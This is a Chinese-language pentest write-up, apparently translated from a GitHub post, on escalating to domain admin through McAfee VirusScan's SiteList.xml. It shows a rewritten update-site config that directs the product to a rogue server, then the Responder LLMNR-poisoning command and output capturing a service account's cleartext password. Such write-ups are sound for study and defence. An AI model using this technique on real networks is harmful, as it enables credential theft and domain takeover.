原文:https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
在实习的时候进行的渗透测试,我发现一个很好的办法提升域用户权限. 我的工作机器上被安装了 McAfee Virusscan Enterprise 8.8 i,并且我只有一个低权限的账号.
Mcafee 有一个自定义功能的更新服务器,可以通过HTTP或SMB连接到这些服务器。. (C:\ProgramData\McAfee\Common Framework\) SiteList.xml 有一些有趣的信息和一些内部服务器名字 ...
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">
<HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0"
Server="update.nai.com:80">
<RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth>
<UserName></UserName>
<Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password>
</HttpSite>
<UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</UNCSite>
<UNCSite Type="repository" Name="Tokyo" Order="18" Server="tokyo000" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</UNCSite>
</SiteList></ns:SiteLists>
让我们看看 McAfeeService 用户有什么特权.
PS C:\Users\TAirane> net user McAfeeService /domain
The request will be processed at a domain controller for domain companydomain.
User name McAfeeService
Full Name McAfee ePO
Comment Service Account for ePO Replication
User's comment
Country/region code 000 (System Default)
Account activeYes
Account expires Never
Password last set 29/01/2007 16:03:12
Password expiresNever
Password changeable 29/01/2007 16:03:12
Password required Yes
User may change passwordYes
Workstations allowedAll
logon script
User profile
Home directory
Last logon29/01/2016 17:55:09
logon hours allowed All
Local Group Memberships *All Repository*Repository
Global Group memberships*Domain Services Account*Workstations Administrator
*Servers Administrator*Domain Users
The command completed successfully.
不幸的是这个 AV 使用了 GUI 密码,我不能编辑这个文件. 不过呢,我在我的虚拟机里重新下载了一份 McAfee 然后覆盖了工作机器上的 SiteList.xml.
在这个时候,我知道我已经块成功了. 我把文件修改成差不多下面这样, 然后我通过Responder来伪造返回一些HTTP请求..
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">
<HttpSite Type="fallback" Name="PWNED!" Order="26" Enabled="1" Local="0"
Server="fuckingrandomserver:80">
<RelativePath>LICORNE</RelativePath><UseAuth>1</UseAuth>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</HttpSite>
</SiteList></ns:SiteLists>
我点击更新 McAfee 病毒库 并且开始了 Responder 程序.
root@kali:~/Tools/responder# python Responder.py -I eth0 --basic
__
.----.-----.-----.-----.-----.-----.--||.-----.----.
| _|-__|__ --|_|_| |_||-__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS,LLMNR & MDNS Responder 2.3
Original work by Laurent Gaffie (lgaffie@trustwave.com)
To kill this script hit CRTL-C
...
[+] Poisoners:
LLMNR[ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server[ON]
HTTPS server [ON]
WPAD proxy [OFF]
SMB server [ON]
Kerberos server[ON]
sql server [ON]
FTP server [ON]
IMAP server[ON]
POP3 server[ON]
SMTP server[ON]
DNS server [ON]
LDAP server[ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE[ON]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth[OFF]
Force Basic Auth [ON]
Force LM downgrade [OFF]
Fingerprint hosts[OFF]
[+] Generic Options:
Responder NIC[eth0]
Responder IP [192.168.169.140]
Challenge set[1122334455667788]
[+] Listening for events...
[*] [LLMNR]Poisoned answer sent to 192.168.169.141 for name fuckingrandomserver
[HTTP] Basic Client : 192.168.169.141
[HTTP] Basic Username : McAfeeService
[HTTP] Basic Password : *\cool_its_a_strong_password/*
日了狗了,我拿到他了 ! 现在我拥有域控制权限了
Mission accomplished !
欢迎大家关注安全工具箱,每天都会发布实用有趣的安全工具
https://www.92aq.com
微博:
http://weibo.com/u/5824380435/ 微信